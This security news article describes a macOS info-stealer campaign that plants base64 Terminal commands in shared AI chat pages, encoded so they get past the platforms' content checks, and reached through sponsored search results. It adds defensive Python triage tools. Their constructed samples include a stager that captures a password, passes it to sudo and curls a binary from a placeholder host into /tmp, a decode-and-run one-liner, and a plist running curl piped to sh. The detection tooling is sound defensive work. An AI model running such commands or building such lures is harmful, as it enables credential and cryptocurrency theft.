Hackers are using shared LLM chats to steal passwords and cryptocurrency. A new malware campaign abuses legitimate AI platforms to deliver malicious instructions directly to unsuspecting macOS users. The threat actors buy sponsored Google search results for common troubleshooting queries, such as “how to clear storage on Mac”, and point them at fake ChatGPT and DeepSeek shared chat links. The shared chats look like helpful system instructions but contain commands designed to compromise the machine.
The attack begins when the user lands on a seemingly legitimate shared chat that gives step-by-step instructions for freeing storage space on a Mac. Embedded in those steps is a base64-encoded command that, once pasted into Terminal and run, downloads and executes a multi-stage malware program. The encoding lets the instructions pass the safety checks these AI platforms apply to chat content, and the link itself sits on the platform’s own domain, so the attacker can deliver targeted malicious commands through what looks like an official channel.
Sophisticated Tactic for Password and Crypto Theft
The infection chain starts with a bash script that prompts the user for their system password under the guise of a credential verification step. Once captured, the password is used to escalate privileges and download the main malware binary from attacker-controlled servers. Analysts at Breakpoint Security identified the sample as Shamus, a known information stealer and cryptocurrency thief that has been widely documented in security communities. The social-engineering step matters: no legitimate storage-cleanup instruction needs the user to type their password into a script, and nothing pasted into Terminal should be run before it has been decoded and read.
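The two steps above, an encoded one-liner that the victim pastes into Terminal and a decoded stager that asks for the password and fetches a binary, are the point at which a careful user or a help-desk analyst can still catch the attack. The following is an added example (not code from the article, from Breakpoint Security or from the Shamus sample) of a small triage helper: it pulls every base64-looking token out of a pasted command, decodes it, and reports the indicators a practitioner would look for before running anything. The sample command is constructed inline from a benign script so the example runs offline; the URL in it is a placeholder, not a real attacker host, and the indicator patterns are this example’s own heuristics, not a published signature.

```python
import base64
import binascii
import re

# Constructed sample: a stager shaped like the one the article describes.
# It is embedded here only so the example runs offline; example.invalid
# is a reserved placeholder domain, not a real command-and-control host.
DECODED_SCRIPT = """#!/bin/bash
echo "Verifying your credentials to clear system storage..."
read -s -p "Password: " pw
echo "$pw" | sudo -S true 2>/dev/null
curl -s https://example.invalid/update -o /tmp/.update && chmod +x /tmp/.update
/tmp/.update "$pw"
"""

# The one-liner a victim would be told to paste into Terminal.
SAMPLE_COMMAND = 'echo "%s" | base64 -d | bash' % (
    base64.b64encode(DECODED_SCRIPT.encode()).decode()
)

# Heuristic indicators (assumptions of this example, not a published signature).
# Each is checked against the pasted command plus everything decoded from it.
INDICATORS = [
    ("pipes decoded content into a shell",
     re.compile(r"base64\s+(-[dD]|--decode)\s*\|\s*(ba|z)?sh\b")),
    ("prompts for a password", re.compile(r"read\s+-s|[Pp]assword")),
    ("feeds a captured password to sudo", re.compile(r"sudo\s+-S")),
    ("downloads from a remote host", re.compile(r"\b(curl|wget)\b")),
    ("drops and marks an executable", re.compile(r"chmod\s+\+x")),
    ("writes to a temp directory", re.compile(r"/tmp/|/var/folders/|/private/tmp/")),
    ("installs a launchd item", re.compile(r"launchctl|LaunchDaemons|LaunchAgents")),
]

# A run of base64 alphabet characters long enough to be a payload rather than a word.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_payloads(command: str) -> list[str]:
    """Return the decoded text of every base64-looking token in the command."""
    decoded = []
    for match in B64_TOKEN.finditer(command):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (ValueError, binascii.Error):
            continue  # looked like base64 but is not; skip it
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def triage(command: str) -> dict:
    """Decode the command's payloads and list which indicators fire on them."""
    payloads = decode_payloads(command)
    text = command + "\n" + "\n".join(payloads)
    findings = [label for label, pattern in INDICATORS if pattern.search(text)]
    return {
        "decoded": payloads,
        "findings": findings,
        # Absence of findings means "read it yourself", never "safe to run".
        "verdict": "refuse to run" if findings else "inspect manually",
    }


if __name__ == "__main__":
    report = triage(SAMPLE_COMMAND)
    print("Decoded payload:\n" + report["decoded"][0])
    for finding in report["findings"]:
        print("-", finding)
    print("Verdict:", report["verdict"])
```

The decoding step is the important one. A base64 blob reveals nothing to a user reading the chat, but the decoded script plainly reads its own password prompt, pipes the password into `sudo -S`, and fetches a hidden executable into `/tmp`; those are the lines a victim would have refused to type by hand.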
The malware’s evasion relies on layered encoding. It combines arithmetic and XOR encoding with a custom 6-bit decoder to hide its code from analysis tools, which makes its real functionality hard to recover through static analysis alone. Once installed, it persists by creating a LaunchDaemon that runs automatically at startup, so the compromise survives reboots. LaunchDaemons live in /Library/LaunchDaemons and can only be installed with administrator rights, which is one reason the stager needs the user’s password in the first place.
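Persistence through a LaunchDaemon is also where the infection becomes visible to a defender. The following is an added example (not from the article, and it does not reproduce the Shamus sample’s actual plist, which the article does not show) of how an incident responder might triage the plists in /Library/LaunchDaemons: it parses each one and flags programs outside trusted locations, hidden or staging paths, Apple-style labels that point at non-Apple binaries, and inline interpreters or downloaders in ProgramArguments. The trusted-prefix and staging-directory lists are this example’s own assumptions, and the three sample plists are constructed inline so the example runs offline on any platform.

```python
import plistlib
import re
from pathlib import Path

# Assumptions of this example: where legitimate daemons normally live, and
# where droppers typically stage a payload. Tune these for your fleet.
TRUSTED_PREFIXES = ("/System/", "/usr/libexec/", "/usr/sbin/", "/usr/bin/",
                    "/bin/", "/sbin/", "/Library/Apple/", "/Applications/")
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
INLINE_EXEC = re.compile(r"\b(sh|bash|zsh)\s+-c\b|\bosascript\b|\bcurl\b|\bbase64\b")


def program_path(plist: dict) -> str:
    """The binary launchd will execute: Program, else ProgramArguments[0]."""
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else ""


def assess(plist: dict) -> list[str]:
    """Return the reasons a single parsed plist looks suspicious (empty if none)."""
    reasons = []
    prog = program_path(plist)
    args = " ".join(plist.get("ProgramArguments") or [])
    label = plist.get("Label", "")
    trusted = prog.startswith(TRUSTED_PREFIXES)
    if not prog:
        reasons.append("no Program or ProgramArguments")
    elif not trusted:
        reasons.append(f"program outside trusted locations: {prog}")
    if prog.startswith(STAGING_DIRS) or "/." in prog:
        reasons.append("program in a staging or hidden path")
    if label.startswith("com.apple.") and not trusted:
        reasons.append("Apple-style label but non-Apple program")
    if INLINE_EXEC.search(args):
        reasons.append("inline interpreter or downloader in ProgramArguments")
    if plist.get("RunAtLoad") and not trusted:
        reasons.append("runs at boot from an untrusted program")
    return reasons


def scan(plists: dict[str, bytes]) -> dict[str, list[str]]:
    """Map plist file name -> reasons, for every plist that raised at least one."""
    report = {}
    for name, data in plists.items():
        try:
            parsed = plistlib.loads(data)
        except plistlib.InvalidFileException:
            report[name] = ["unparseable plist"]
            continue
        reasons = assess(parsed)
        if reasons:
            report[name] = reasons
    return report


def scan_directory(directory: str = "/Library/LaunchDaemons") -> dict[str, list[str]]:
    """Run the same checks over a real directory on a Mac (needs read access)."""
    return scan({p.name: p.read_bytes() for p in Path(directory).glob("*.plist")})


# Constructed samples: one benign daemon, one masquerading as an Apple daemon
# from a hidden staging path, and one that hides a download inside `sh -c`.
# example.invalid is a reserved placeholder domain, not a real host.
SAMPLE_PLISTS = {
    "com.example.legit.plist": plistlib.dumps({
        "Label": "com.example.legit",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper"],
        "RunAtLoad": True,
    }),
    "com.apple.softwareupdated.plist": plistlib.dumps({
        "Label": "com.apple.softwareupdated",
        "ProgramArguments": ["/Users/Shared/.cache/.update"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    "com.example.helper.plist": plistlib.dumps({
        "Label": "com.example.helper",
        "ProgramArguments": ["/bin/sh", "-c",
                             "curl -s https://example.invalid/p | base64 -d | sh"],
    }),
}


if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_PLISTS).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

On a live system, `scan_directory()` is the call to run, and it should be paired with checks the plist alone cannot give you: the file’s modification time against the user’s complaint window, the code signature of the program it points at, and whether `launchctl list` shows the label as loaded.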
Shamus targets sensitive data across several categories. It collects cookies and saved passwords from Chrome, Firefox, and 12 other Chromium-based browsers. It also goes after cryptocurrency wallets, specifically 15 desktop and hardware-wallet companion applications, including Ledger Live, Trezor Suite, Exodus, Coinomi, Electrum, and Bitcoin Core. The breadth of that list shows the attackers’ intent to extract as much financial value as possible from each compromised system.
The malware is also reported to steal the entire macOS Keychain database, which holds a wide range of user credentials and secrets, and it extracts Telegram session data, VPN profiles, and files from the Desktop and Documents folders. After collection, the stolen data is compressed and sent to the attacker’s command-and-control servers over encrypted connections, which makes the exfiltration harder to spot in network traffic.
The campaign shows how threat actors keep finding new distribution channels that look innocuous to the victim, in this case an AI chat interface reached through a sponsored search result. Both halves of that chain carry trust the attacker did not earn: the ad appears above the organic results, and the chat is hosted on a well-known platform’s domain. System-level instructions and troubleshooting steps deserve particular scrutiny wherever they come from.
Security researchers are urging users to treat sponsored search results with caution and to verify AI-generated content before executing any command or entering personal information. In practical terms: decode any base64 blob before running it, never paste a command you cannot read into Terminal, and treat a script that asks for your password as a red flag. AI platforms continue to improve their safety checks, but threat actors adapt just as quickly, and basic vigilance remains the most reliable defence.